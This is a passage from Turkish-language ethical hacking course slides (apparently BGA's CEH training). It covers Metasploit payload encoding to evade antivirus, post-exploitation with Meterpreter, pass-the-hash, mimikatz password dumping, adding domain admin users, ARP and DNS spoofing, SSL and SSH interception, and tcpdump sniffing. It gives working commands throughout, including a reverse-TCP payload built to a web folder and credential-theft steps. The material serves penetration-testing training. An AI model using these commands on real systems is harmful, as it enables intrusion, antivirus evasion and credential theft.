 ve Engelleme Sistemleri (IDS/IPS), Güvenlik Duvarları (Firewall)
ve
Antivirüsler tarafından tanınmasını engeller/zorlaştırır.
Metasploit
Frameworkde 27+ encoder bulunuyor.Encoderları listelemek için
-l paramatresi diğer seçenekler için –h parametresi kullanılır.
BGA | CEH
@BGASecurity
Msfencode
 Encoder Kullanımı
 Shellcode’u msfpayload ile raw formatında msfencode a aktarıp içeriği
encode edebilirsiniz.
Metasploit’de bulunan güçlü encoder’lar ile içerik antivirus, content
fitler, ids/ips sistemleri tarafından tanınmaz hale getirilebilir.
# msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112
LPORT=4443 R | msfencode -e x86/shikata_ga_nai -t exe -o
/var/www/payload.exe
BGA | CEH
@BGASecurity
Msfencode
 Multi-Encoder Kullanımı
 Payload içeriği bir çok encoder ile değiştirilerek yeniden oluşturulabilir.
# msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112
LPORT=4443 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw |
msfencode -e x86/alpha_upper -c 2 -t raw | msfencode –e
x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 –t
exe -o /var/www/payload2.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
…..
@BGASecurity
Client - Side Saldırı
Yöntemleri
BÖLÜM - V
BGA | CEH
@BGASecurity
Client-Side Saldırı Yöntemleri | İçerik
1. Browser Tabanlı Açıklıklar
2. Binary Payloadlar
3. Antivirüsleri Atlatmak
4. Linux Binary Trojan
5. Java Uygulamalarını Bulaştırmak
6. File Format Exploitler
7. VBScript Enjekte Yöntemleri
BGA | CEH
@BGASecurity
Browser Tabanlı Açıklıklar
 Bir browser exploiti, kötü amaçlı geliştirilmiş zararlı kod parçasıdır.
 Kullanıcının bilgisi olmadan, bilgisayarına zararlı yazılım
bulaştırmak veya izinsiz/yetkisiz değişikliklerde bulunmak için
kullanılır.
 Zararlı kod; HTML, Image, Java, Javascript, ActiveX veya başka bir
web teknolojisi olabilir.
 Zayıflıklar, browser teknolojisinden veya eklentilerinden
kaynaklanabilir
BGA | CEH
@BGASecurity
Browser Tabanlı Açıklıklar
Internet Explorer CSS IMPORT
BGA | CEH
@BGASecurity
Smbexec ile antivirüs atlama
BGA | CEH
@BGASecurity
Veil ile AV Atlatma
 Av atlatmak için zararlı oluşturma için kullanılabilecek
başarılı bir araçtır.
veil -l powershell -p VirtualAlloc -o undetectable --
msfpayload windows/meterpreter/reverse_tcp --
msfoptions LHOST=6.6.6.150 LPORT=443
BGA | CEH
@BGASecurity
Metload ile Antivirüs Atlatma
 64 bit sistemler için derleme;
x86_64-w64-mingw32-gcc -o metload64.exe metload.c -
lws2_32
 32 bit sistemler için derleme;
i686-w64-mingw32-gcc -o metload32.exe metload.c -
lws2_32
BGA | CEH
@BGASecurity
Migrate ile Antivirüs Atlatma
 Meterpreter ajanı çalışan başka bir uygulamaya kendini
bulaştırabilir ve o uygulama üzerinden yetkisiz işlevler
gerçekleştirebilir.
 Uygulamaya bulaştığında uygulamanın boyutu değişmez
 Antivirus, Antilogger bypass için tercih edilir.
 Proxy Auth. Bypass etmek için kullanılır.
BGA | CEH
@BGASecurity
Migrate ile Antivirüs Atlama II
 Kullanımı
meterpreter > migrate
Usage: migrate pid
 “ps” komutu ile çalışan processlerin id si öğrenilebilir.
meterpreter > ps
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
860 explorer.exe x86 1 pentestlabsozanus C:WindowsExplorer.EXE
BGA | CEH
@BGASecurity
Migrate ile Antivirüs atlama
meterpreter > migrate 860
[*] Migrating to 860...
[*] Migration completed successfully.
meterpreter > getuid
Server username: pentestlabsozanus
BGA | CEH
@BGASecurity
#Exploit Sonrası Sistemde İlerleme
Post exploitation olarak da adlandırılır.
Amaç herhangi bir güvenlik zafiyeti kullanarak sisteme
gerçekleştirilen yetkisiz, düşük yetkili bir kullanıcı haklarıyla
sistemi ele geçirme, sistemi ara geçit olarak kullanarak
başka sistemlere atlama.
Bu bölüm, exploit sonrası uzak sistemde ilerleme,gizleme ve
kayıtları silme yöntemlerinin anlaşışması ve uygulanmasını
içerir.
BGA | CEH
@BGASecurity
İlerleme Adımları/Aşamaları
1. Yetki Yükseltme
2. Hashdump
3. Parola Kırma (jonh the ripper)
4. Başka Bir Uygulamaya Bulaşmak
5. Pivoting
6. Memorydump
7. Uzak Masaüstü Bağlantısı Başlatmak
8. Hedefin Canlı Oturumuna Geçiş
9. İz Temizleme
10. Trafik Dinleme (Packet Sniffing)
11. Ekran Görüntüsü Yakalama
12. Ses, Webcam Görüntüsünü Yakalama
BGA | CEH
@BGASecurity
Yetki Yükseltme
Hedef sistem, kisitli kullanici yetkileri ile ele
geçirildiginde yetki yükseltmek ve farklı
kullanıcı yetkilere geçiş yapmak.
BGA | CEH
@BGASecurity
Yetki Yükseltme
meterpreter > getsystem
Local privilege escalation teknikleri ile SYSTEM yetkilerine
yükseltir.
meterpreter > getsystem -t 1
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
BGA | CEH
@BGASecurity
Yetki Yükseltme
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)
BGA | CEH
@BGASecurity
Hasdump
Windows sistemlerde SAM database’inden kullanıcı
hesaplarını ve LM/NTML password hashlerini alır.
BGA | CEH
@BGASecurity
Yetki Yükseltme Aşaması
 Meterpreter ajanı çalışan başka bir uygulamaya kendini
bulaştırabilir ve o uygulama üzerinden yetkisiz işlevler
gerçekleştirebilir.
 Uygulamaya bulaştığında uygulamanın boyutu değişmez
 Antivirus, Antilogger bypass için tercih edilir.
 Proxy Auth. Bypass etmek için kullanılır.
BGA | CEH
@BGASecurity
Pivoting
 Uzak ağı, dış dünyaya açmak için kullanılır.
 Firewall/NAT veya Router arkasındaki sistemlere
erişmek için tercih edilir.
 Port yönlendirme yapılabilir.
 Uzak ağ ile VPN tuneli kurulabilir.
BGA | CEH
@BGASecurity
Pivoting | Portfwd
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect to.
-r <opt> The remote host to connect to.
meterpreter > portfwd add -l 3389 -p 3333 -r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3333
BGA | CEH
@BGASecurity
Pivoting | Route
 Uzak ağdaki diğer ip adreslerine erişmek için kullanılır.
 VPN tuneline benzetilebilir.
BGA | CEH
@BGASecurity
Pivoting | Route
msf > route -h
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]
Route traffic destined to a given subnet through a supplied session.
The default comm is Local.
msf > route add 1.1.1.0 255.255.255.0 1
[*] Route added
msf > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
1.1.1.0 255.255.255.0 Session 1
BGA | CEH
@BGASecurity
İz Temizleme
 Windows Loglarını Silme
BGA | CEH
@BGASecurity
Trafik Dinleme (Packet Sniffing)
 Exploiting sonrası hedef sistemde ilerleme aşamasında trafik kayıtları önemli
veriler içerebilir.
 Uzak bir sistem ele geçirildiğinde, hedef sistemde ilerlemek için elde edilecek
kritik verilerden biride network trafiğidir.
 Ele geçirilen sistemin üzerinden ftp,http,smtp,pop3 vb. trafiği akıyor ve şifre
içeriyor olabilir. Meterpreter ajanının sniffing özelliği ile, uzak sistemin ağ
kartını dinleyerek trafiği kaydedebilirsiniz.
BGA | CEH
@BGASecurity
Trafik Dinleme (Packet Sniffing)
meterpreter > use sniffer
Sniffer Komutları
================
Command Description
------- -----------
sniffer_dump Retrieve captured packet data to PCAP file
sniffer_interfaces Enumerate all sniffable network interfaces
sniffer_start Start packet capture on a specific interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet capture on a specific interface
BGA | CEH
@BGASecurity
Trafik Dinleme (Packet Sniffing)
Komut açıklamaları;
sniffer_dump: Yakalanan trafiği dosya olarak kaydeder.
sniffer_interfaces: Ağ arabirimlerinin listesini verir.
sniffer_start: Belirtilen ağ arabirimi için paket yakalamaya
başlar
sniffer_stats: Aktif sniffing için istatistlik sunar
sniffer_stop: Belirtilen ağ arabirimi için dinlemeyi sonlandırır.
BGA | CEH
@BGASecurity
Trafik Dinleme (Packet Sniffing)
 Hedef sistemdeki ağ arabirimlerinin listesini ver,
meterpreter > sniffer_interfaces
1 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514
usable:true dhcp:false wifi:false )
 1 numaralı ağ arabirimini dinle, 20000 paket yakala
meterpreter > sniffer_start 1 20000
[*] Capture started on interface 1 (20000 packet buffer)
BGA | CEH
@BGASecurity
Trafik Dinleme (Packet Sniffing)
 Yakalanan trafiği diske kaydet
meterpreter > sniffer_dump 1 /tmp/win2.cap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 6044 packets (741732 bytes)
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/win2.cap
 Sniffing işlemini durdur
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
BGA | CEH
@BGASecurity
Trafik Dinleme (Packet Sniffing)
# tshark -r /tmp/win2.cap -R ftp
1182 15.000000 89.19.25.155 -> 1.1.1.101 FTP 96 Response: 220-FileZilla Server version
0.9.24 beta
1183 15.000000 89.19.25.155 -> 1.1.1.101 FTP 99 Response: 220-written by Tim Kosse
(Tim.Kosse@gmx.de)
1184 15.000000 89.19.25.155 -> 1.1.1.101 FTP 115 Response: 220 Please visit
http://sourceforge.net/projects/filezilla/
1187 15.000000 1.1.1.101 -> 89.19.25.155 FTP 69 Request: USER bgaegitim
1188 15.000000 89.19.25.155 -> 1.1.1.101 FTP 90 Response: 331 Password required for
ozanucar
1189 15.000000 1.1.1.101 -> 89.19.25.155 FTP 78 Request: PASS benimgizliparolam
BGA | CEH
@BGASecurity
Exploit Sonrası Sistemde İlerleme
 Post exploitation olarak da adlandırılır.
 Amaç herhangi bir güvenlik zafiyeti kullanarak sisteme gerçekleştirilen
yetkisiz, düşük yetkili bir kullanıcı haklarıyla sistemi ele geçirme, sistemi ara
geçit olarak kullanarak başka sistemlere atlama.
 Bu bölüm, exploit sonrası uzak sistemde ilerleme,gizleme ve kayıtları silme
yöntemlerinin anlaşışması ve uygulanmasını içerir.
BGA | CEH
@BGASecurity
Pass The Hash ile Diğer sistemlere erişim
 Windows sistemler üzerinde elde edilen parola özeti(hash) ile doğrudan
diğer sistemlere bağlantı gerçekleştirilebilmektedir.
 Bunun için smb_login modülü kullanılabilir.
(Blank_password,user_as_pass,spool)
use auxiliary/scanner/smb/smb_login
Set RHOST file://root/target.txt
Set SMBUser user
Set SMBPass pass
Exploit
BGA | CEH
@BGASecurity
Pass the hash ve Token Bulma
 Easyda.sh
 Metasploit Psexec_loggedin_users modülü
 Find_token.exe
 Bağlantıkları sistmlerde hangi kullanıcılara ait token varsa listelerler.
C:> find_token.exe –f ipler.txt username password
 Password bölümüne parolanın windows hash değeri de girilebilir
BGA | CEH
@BGASecurity
DC’yi bulma ve kullanıcı ekleme
 DC tespit edilir(run post/windows/gather/enum_domain)
use incognito
run post/windows/gather/enum_domain
 DC’ye mevctu tokenlar kullanılarak kullanıcı eklenir
add_user celal celal123!! –h dc_ip
 DC’ye eklenen kullanıcı Domain admins/local administrators
grubuna eklenir.
add_group ‘Domain Admins’ celal –h dc_ip
add_localgroup_user ‘Administrators’ celal –h dic_ip
BGA | CEH
@BGASecurity
Sistemlerden Parolaları Cleartext Alma
 Erişim sağlanan bir sistem belleğinden tüm kullancılara ait
parolalar açık olarak elde edielbilmektedir.(mimikatz)
use mimikatz
ps –s winlogon
migrate PID
Wdigest
BGA | CEH
@BGASecurity
Sistemlerden Parolaları Cleartext Alma - II
 Mimikatz.exe hedef sisteme yüklenir. Ardından
aşağıdaki komutlar ile hedef sistem üzerindeki
parolalar açık olarak alınabilir.
privilege::debug
sekurlsa::logonpasswords
BGA | CEH
@BGASecurity
Wce.exe ile mevcut parolayı değiştirme
 Tüm kullanıcı parolalarını listelemek için (wce.exe –l)
 Mevcut bir kullanıcı hashini değiştirmek için (wce –s administrator:domain:hash)
 Parolaları açık almak için (wce -w)
 Parola hashi oluşturmak için (wce –g 123456)
BGA | CEH
@BGASecurity
Psexec ile sistemden parolasız shell
 wce –s administrator:domain:hash ile mevcut admin
kullanıcı parolası değiştirilirse doğrudan c$ (IPC$)
üzerinden de parolasız bağlantı kurulabilir.
 psexec IPc$ -s cmd komutu ile shell elde edilebilir.
 Ardından hedef sisteme c$ üzerinden atılan zararlı
çalıştırılarak meterpreter oturumu elde edilebilir.
BGA | CEH
@BGASecurity
Route Kullanılarak Port Tarama(Nmap)
 msf > db_nmap 6.6.6.0/24 -n -v -p 80,21 –open // nmap port tarama
 msf > hosts –u //Up olan sistemleri getirir
 msf > hosts -S tomcat –u //İçerisinde tomcat geçen up sistemler
 msf > services -p 445 –u //445 portundan yalnız açık olanları listelere
 msf > services -p 80 –R //80 portu açık olan sistemlerin yalnız IP
adreslerini liste halinde bir dosyaya yazar yazdığı dosyayı size söyler.
 msf > hosts -u –R //Up olan sistemlerin IP adreslerini bir dosyaya yazar
ve bunu bize söyler
BGA | CEH
@BGASecurity
Metasploit’e Nmap Sonuçlarını İmport
 msf > db_import /root/Desktop/test.xml
 [*] Importing 'Nmap XML' data
 [*] Import: Parsing with 'Nokogiri v1.6.1'
 [*] Importing host 193.140.255.1
 [*] Importing host 193.140.255.13
 [*] Importing host 193.140.255.17
 [*] Importing host 193.140.255.19
 [*] Importing host 193.140.255.20
BGA | CEH
@BGASecurity
Armitage Kullanımı
BGA | CEH
@BGASecurity
TCP/IP Güvenliği
 TCP/IP güvenlik düşünülerek tasarlanmış bir protokol değildir.
 Veri iletişimini her durumda sağlıklı ve güvenilir (verinin
iletildiğinden emin olma) bir şekilde yapması amaçlanmıştır.
 Alt seviye protokollerin(ARP)güvenilirliği üst seviye protokolleri
etkiler.
BGA | CEH
@BGASecurity
Arp Zehirleme (MITM Saldırısı) - I
 ARP(Address Resolation Protokol) Layer 2’nin temel protokolüdür.
 Yerel ağda iletişim IP adresi yerine MAC adresi üzerinden gerçekleştirilir.
 İletişime geçilecek tüm cihazların (default gw dahil) MAC adresleri
bilinmelidir.
 MAC adresi yazılımsal olarak değiştirilebilir. (macchanger)
 ARP poisoning, saldırganın kendisini GW olarak göstermesidir.
BGA | CEH
@BGASecurity
Arp Zehirleme (MITM Saldırısı) - II
 Saldırgan sürekli olarak ortama arp replay paketleri
göndermektedir.(Broadcast olarak)
 Herhangi bir kullanıcı bir yere gitmek istediğinde arp request oluşturacak ve
buna saldırganın arp replay paketleri dönecektir.
 Böylece kurbanlar arp poisoninge uğramış olacaktır.
 arp –a komutu ile tüm iletişim halindeki sistmlere ait MAC-IP bilgisi
görülebilir. Default gw mac adresi olarak artık saldırganın MAC adresi bu
listede görülebilir.
BGA | CEH
@BGASecurity
Ettercap ile MITM Saldırısı
 Ettercap ile aşağıdaki komut ile MITM gerçekleştirilebilir.
ettercap –i eth0 –T –M ARP /zehirlecek_ip/ /gateway/
BGA | CEH
@BGASecurity
ArpSpoof ile MITM
 arpspoof -i <interface> -t <target IP> <gateway IP>
 Şeklinde arpspoof ile de man in the middle saldırısı gerçekleştirilebilir.
 Ama öncelikle aşağıdaki komut ile trafik route edilmelidir.
echo 1 > /proc/sys/net/ipv4/ip_forward
BGA | CEH
@BGASecurity
Switch Kullanılan Ağlarda Trafik Dinleme
 Hub ve benzeri ortamlarda trafik tüm portlara gider.
 Switch ise sadece iletişim kuran iki host arasında paketleri döndürür.
 Her host sadece kendisine ve broadcast adresine gelen paketleri görebilir.
BGA | CEH
@BGASecurity
ARP Paket Çeşitleri
 4 cesit ARP mesajı vardır
ARP request : IP Adresine ait donanım adresi(MAC adresi) sorgulamak için kullanılır
10:09:20.356809 arp who-has 12.16.6.17 tell 12.16.6.185
ARP reply : Belirtilen Ip adresine uyan donanım adresini döndürür
10:09:20.356809 arp reply 12.16.6.17 is-at 0:80:c8:f8:5c:73
RARP request: Belirli bir MAC adresi için IP adresi sorgulaması için kullanılır
RARP reply : Belirli MAC adresi için IP adresi cevabı döndürür.
BGA | CEH
@BGASecurity
ARP Cache Poisoning/ ARP Spoofing(ARP Bellek Zehirlemesi)
 Amaç: Kurban sisteme sahte arp paketleri(arp-reply) göndererek kendisini
farklı bilgisayar gibi (Gateway?) göstermek ve kurbanın göndereceği trafiği
üzerinden geçirmek.
 ARP Poisoning gerçekleştirmek için kullanılan temel araçlar;
 Linux İçin:
 Arpspoof, nemesis, Ettercap
 Windows için:
 Winarpspoof, Ettercap, Cain&Abel
BGA | CEH
@BGASecurity
Nemesis ile Arp Spoof Uygulaması
BGA | CEH
@BGASecurity
Cain & Abel ile Spoofing / Poisoning Çalışmaları
 Cain & Abel çok amaçlı bir Güvenlik aracıdır
 Cain ve Abel olarak iki ana parçadan oluşur.
 Bir parçası daha çok sistem ve parola işlemleri,
 diğeri parçası ağ güvenliği ile alakalı programlar içerir.
ARP spoof işlemi hangi
arabirim üzerinden
yapılacak?
BGA | CEH
@BGASecurity
Cain&Abel ile Hedef Host Keşfi
BGA | CEH
@BGASecurity
ARP Belleği Zehirlenecek Kurban Seçimi
BGA | CEH
@BGASecurity
Kurbana Ait Parola Bilgilerini Görme
BGA | CEH
@BGASecurity
Dnsspoof Çalışması
 Amaç kurban olarak seçilen sistemin yapacağı dns sorgulamalarına müdahele etmektir.
 Dnsspoof öncesi durum:
Arpspoof ile hedef sistemin
trafigi üzerimizden gecirilir.
BGA | CEH
@BGASecurity
Dnsspoof Çalışması-II
 ip_forward aktif duruma getirilerek trafigin hedefine yönlendirilmesi
sağlanır.
 Değiştirilmek istenen domainlere ait kayıtlar /tmp/domains dosyasına
aşağıdaki formatta girilir.
127.0.0.1 *.google.com
192.168.1.5 www.linux.com
 dnsspoof aracı çalıştırılır.
BGA | CEH
@BGASecurity
Dnsspoof Saldırısını İzleme
DNS Cache cevap verebilir.
Dns cache temizlenip
tekrar sorgulanır...
BGA | CEH
@BGASecurity
HTTPS Trafiğinde Araya Girme
 SSL bağlantılarında araya girme fikri ilk bakışta zor hatta imkansız gibi görülse de
gerekli şartlar oluşturulduğunda oldukça kolay başarılabilmektedir
 Gerekli Şartlar:
 İlk olarak hedef sistemin trafiği APR ile bizim üzerimiden geçecek şekilde kandırılmalıdır.
 Hedef sistemin iletişim kurmak istediği HTTPS sayfasına ait sertifika bilgileri ile sahte bir
sertifika oluşturulmalıdır.
 Sahte oluşturulan bu sertifika tüm modern browserlarda kullanıcıya uyarı verecektir.
 Bazı browserlar bu uyarıyı oldukça kullanıcı yanlısı (rahatsız etmeyici yumusak bir
mesaj) bazıları da oldukça rahatsız edici ve problemi belirtici uyarılarla gösterirler.
BGA | CEH
@BGASecurity
Internet Explorer SSL MITM Uyarısı
BGA | CEH
@BGASecurity
Firefox SSL MITM UYARISI
BGA | CEH
@BGASecurity
Browser Hataları
Internet Explorer 7,8
Firefox
BGA | CEH
@BGASecurity
Cain&Abel ile SSL MITM Uygulaması
Çözümlenen SSL altındaki
protokole(örnekte http) ait
gizli bilgiler de sol tarafda
gözükecektir.
BGA | CEH
@BGASecurity
Ettercap : Gelişmiş Hijacking Aracı
 Ettercap, Linux ve Windows sistemlerde çalışan çok yönlü
trafik dinleme, araya girme ve veri değiştirme aracıdır.
 TCP/IP’deki zayıflıklardan yararlanır.
 Komut satırı ve grafik arabirim seçenekleri mevcuttur.
ettercap –C ile Curses modda
çalıştırır
Ettercap –I interaktif modda
çalıştırır.
BGA | CEH
@BGASecurity
Ettercap Kullanımı
 İlk işlem hangi tür sniffing
yapılacağının seçilmesi
 Kurban sistem bulmak için
Yerel ağ taraması yapılır.
BGA | CEH
@BGASecurity
Kurban Seçimi
Buradan istenilen system hedef olarak seçilir ve Target olarak eklenir.
1
2
4
3
BGA | CEH
@BGASecurity
Bağlantıları Yönetme
BGA | CEH
@BGASecurity
Ettercap Filtreleri
Ettercap’in en güçlü olduğu yanlardan biri de akan trafikte filtreleme
yapabilmesi ve bu filtrelemeye göre trafiği kaydedip değiştirebilmesidir.
BGA | CEH
@BGASecurity
SSH Protokolünde Araya Girve ve Veri Okuma & Değiştirme
SSH Protokolünde Araya Girilebilir mi?
BGA | CEH
@BGASecurity
SSH Protokolü
 SSH (Secure Shell/Güvenli Kabuk) ağ üzerinden başka
bilgisayarlara erişim sağlamak, uzak bir bilgisayarda komutlar
çalıştırmak ve bir bilgisayardan diğerine dosya transferi amaçlı
geliştirilmiş bir protokoldür.
 Bir iletişimde SSH aşağıda belirtilen temel unsurları sağlar.
• Authentication /Kimlik denetimi
• Encryption /Şifreleme
• Integrity /Bütünlük
BGA | CEH
@BGASecurity
SSH Temel Bilgiler
 SSH1, Tatu Ylönen tarafından geliştirilen ilk orjinal SSH ürünü.
SSH-1 protokolü temel alınarak geliştirilmiştir.
 SSH2, Tatu Ylönen tarafından geliştirilen SSH-2 ürünü.
www.ssh.com
 SSH-1, SSH protocol 1.
 SSH-2, SSH protocol 2 . Günümüzde yaygın kullanımda olan ve
kullanımı tavsiye edilen ssh sürümü. IETF SECSH çalışma grubu
tarafından standartları belirlenmiştir.
BGA | CEH
@BGASecurity
OpenSSH
 OpenSSH son özgür SSH versiyonu olan ssh1.2.12 den türetilmistir
 Ticari SSH sunucular kadar özelliğe sahip
 Dünya SSH servisinin %90~
 Sshscan aracılığı ile alınmış resmi bilgi.
BGA | CEH
@BGASecurity
SSH Protokolü Analizi
BGA | CEH
@BGASecurity
Araya girme nasıl olur?
 SSH-1 protokolü çeşitli tasarımsal güvenlik açıklarına sahip.
 SSH-2 de bunlar giderildi.
 Fakat çoğu sunucu hem ssh-1 hem de ssh-2 destekler.
 Ssh-1 kullanan sistemlerde araya girip veri okuma & değiştirme
yapılabilir.
 Ssh-2 sistemler eğer ssh-1 destekliyorsa “downgrade attack”
gerçekleştirilerek ssh-1 kullanmaya zorlanır ve saldırı yine
başarılı olur.
BGA | CEH
@BGASecurity
SSH1, SSH2 Destekli Sunucu Trafiği
BGA | CEH
@BGASecurity
SSH MITM
BGA | CEH
@BGASecurity
RDP(Remote Desktop Protocol) Araya Girme
 RDP şifreli bir protokoldür
 Public-priv key kullanılarak güvenlik sağlanır
 Prive key tüm bilgisayarlarda aynıdır
 “Public” private key mantığı
 Cain&Abel kullanılarak authentication bilgileri
alınabilir
@BGASecurity
Trafik Analizi, Sniffing
BÖLÜM - VI
BGA | CEH
@BGASecurity
Bölüm İçeriği
 Paket, protokol kavramları
 Temel kavramlar
 Sniffing
 Sniffing'e açık protokoller
 Sniffing çeşitleri
 Aktif Sniff / Pasif Sniff
 Ortama göre sniffer yerleşimi
 Sniffing amaçlı kullanılan araçlar
 Network data carving
BGA | CEH
@BGASecurity
Paket Kavramı..
 İletişim == paket
 Ne işe yarar
 Bilinmeyen Protokol Analizi
 Ag trafiği ölçümü
 Anormal trafik gözleme
 Firewall/IDS/IPS altyapısı..
 TCP, UDP Paketleri
 Protokoller
 SMTP, FTP, P2P trafiği nasıl ayırt edilir
 http://l7-filter.sourceforge.net/protocols
BGA | CEH
@BGASecurity
Temel Kavramlar
 Inline/Pasif Yerleşim
 Ethernet Çalışma modları
 Unicast paketler
 Multicast paketler
 Broadcast paketler
 Promiscious Mode
 Snifferlar genelde Promiscious modda çalışır.
 # ifconfig eth0 –promisc
Komutu arabirimi promisc modda çıkarır
BGA | CEH
@BGASecurity
Ethernet Kartlarında Filtreleme
 Unicast-> Kendi adresine gelen paketler
Broadcast -> Broadcast adresine gelen paketler
Multicast-> uye olunan multicast gruba ait
paketler.
Promiscious -> Gelen paketin ne olduğuna
bakmadan kabul edildiği durum.
BGA | CEH
@BGASecurity
L2 İletişim Ortamları
 HUB
 Switch
 Bridge
BGA | CEH
@BGASecurity
Sniffing ...
 Ağ trafiği dinleme
 Şifreli/şifresiz protokoller
 Sniffingde Amaç?
 Good/Admins = “Protocol Analysis”
 Bad/Hackers = “Sniffing The Wire”
 Developers = “Is My Application Working
BGA | CEH
@BGASecurity
Sniffing’e Açık Protokoller
 Sniffing’e açık:İçerisinde taşıdığı veri okunabilir, şifrelenmemiş trafik
 Hemen hemen tüm protokoller
 Telnet, Rlogin
 HTTP/FTP
 SMTP/POP/IMAP
 Güvensiz Protokollerin güvenli kullanımı
 SSL Wrapper
Internette en sık kullanılan 10 port
BGA | CEH
@BGASecurity
SMTP Bağlantısı
Sniffer
SMTP
Bağlantısı
BGA | CEH
@BGASecurity
SMTP Bağlantısı Detaylar
#mailsnarf –i rl0
BGA | CEH
@BGASecurity
Telnet Bağlantısı
BGA | CEH
@BGASecurity
FTP Bağlantısı
BGA | CEH
@BGASecurity
SQL Bağlantısı
BGA | CEH
@BGASecurity
Şifrelemenin Dezavantajı
BGA | CEH
@BGASecurity
SSL Sarmalayıcı ile Şifreli Trafik
Stunnel
İstemci Sunucu
SSL Sarmalayıcı ŞifreliTrafik
SSL Sarmalayıcı
AçıkTrafik AçıkTrafik
BGA | CEH
@BGASecurity
Stunnel Yapılandırması
995. Porta gelen şifreli istekleri al, şifrelemeyi çöz ve 110. portta çalışan uygulamaya teslim et.
BGA | CEH
@BGASecurity
Sniffing Çeşitleri
 Pasif Sniffing
 Hedef sistemle iletişime geçilmez!
 Sniffing’e dair iz bulunamaz
 HUB kullanılan ortamlarda
 Aktif Sniffing
 Hedef sistemle iletişime geçilir
 Arkasında iz bırakır
 Switch kullanılan Ağlarda yaygındır
BGA | CEH
@BGASecurity
Pasif Sniffing
 HUB/TAP kullanılan ortamlarda işe yarar
 Ortama dahil olan her sistem dolaşan tüm paketleri alır
 Promiscious modda olanlar paketleri kabul eder/kaydeder.
 Sık Kullanılan Araçlar:
 Tcpdump, Wireshark, Snort, Dsniff, Tshark
BGA | CEH
@BGASecurity
Aktif Sniffing
 Amaç: trafiği dinlenecek sistemin paketlerini üzerinden geçirme ya da kopyasını
almak.
 Switch / HUB Farkını hatırlayalım
 Yöntemleri
 MAC Flooding
 ARP Spoofing/Poisoning
 Icmp redirect
 Aktif Sniffing Araçları
 Arpspoof(Dsniff)
 Ettercap
 Cain&Abel
 Macof
 Kolay Yakalanabilir(?)
BGA | CEH
@BGASecurity
Sniffer Yerleşimi
 Ağ ortamının özelliğine göre Snifferların yerleşimi değişmektedir.
 TAP kullanılan ortamlarda
 HUB’lı ortamlarda
 Switch kullanılan ağlarda(Port mirroring)
BGA | CEH
@BGASecurity
Sniffing için HUB Kullanımı
BGA | CEH
@BGASecurity
Sniffing için TAP Kullanımı
TAP cihazı pasif
ya da inline
olabilir
BGA | CEH
@BGASecurity
Sniffing için SPAN Port Kullanımı
BGA | CEH
@BGASecurity
 Tcpdump
 Snoop
 Tshark
 Wireshark
 Eeye IRIS
 Dsniff
 Snort
BGA | CEH
@BGASecurity
 UNIX Tabanlı popüler sniffer yazılımı
 Windows icin windump
 Libpcap tarafından alınan ham veriler tcpdump
tarafından işlenerek okunabilir hale gelir.
 Tamamen ücretsiz bir yazılım.
 Sorun giderme , trafik analizi, hacking amaclı
kullanılabilir.
BGA | CEH
@BGASecurity
Tcpdump Kurulumu
 Linux dağıtımları ile birlikte gelir.
 Windows için Winpcap kurulu olmalıdır.
 Konsoldan
 Tcpdump komutunu calistirdiginizda hata vermiyorsa
sistemede kurulu demektir.
BGA | CEH
@BGASecurity
Ön Bilgiler
 Linux/UNIX altında tcpdump programını kullanabilmek için ya
root haklarına sahip olmak lazım ya da tcpdump programının suid
olarak çalışması lazım.
 Tcpdump, paketleri kernel'a giriş-çıkış yapmadan yakalar bu
sebeple iptables (Linux için) ile yazdığınız kurallar tcpdump'ı
etkilemez.
BGA | CEH
@BGASecurity
Temel Kullanımı
 Tcpdump komut satırından çalışan bir araç olduğu için
parametreler oldukça önemlidir.
 Uygun parametreler ve filtreler kullanılırsa yoğun
trafikte bile istenilen amaca kolaylıkla ulaşılabilir.
BGA | CEH
@BGASecurity
Parametresiz kullanım örneği
BGA | CEH
@BGASecurity
Tcpdump analizi
BGA | CEH
@BGASecurity
Arabirim seçimi
BGA | CEH
@BGASecurity
İsim çözümleme
BGA | CEH
@BGASecurity
Yakalanan paketleri kaydetme
 Tcpdump'ın yakaladığı paketleri sonradan incelemek üzere
dosyaya yazılabilir.
 Dosya formatı libpcap uyumludur.
 -w parametresi kullanılır.
BGA | CEH
@BGASecurity
Kaydedilmiş Paketleri Okuma
-w ile kaydettğimiz paketleri okumak içinde -r
parametresini kullanılır.
BGA | CEH
@BGASecurity
Paket Detaylarını Loglama
-v parametresi ile tcpump'dan biraz daha detaylı loglama yapmasını
isteyebiliriz. Mesela bu parametre ile tcpdump çıktılarını TTL ve ID değerleri
ile birlikte edinebiliriz.
BGA | CEH
@BGASecurity
Filtrelerle Çalışmak
 host Parametresi
 Sadece belli bir host a ait paketlerin izlenmesini istiyorsak
host parametresi ile belirtim yapabiliriz.
 dst host (Hedef Host Belirtimi)
 src host (Kaynak Host Belirtimi)
 # tcpdump src host 10.1.0.59 and dst host 10.1.0.1
BGA | CEH
@BGASecurity
Filtrelerle Çalışmak
 Port parametresi
 belirli bir portu dinlemek istediğimizde kullanacağımız
parametredir. Host gibi src ve dst oneklerini alabilir.
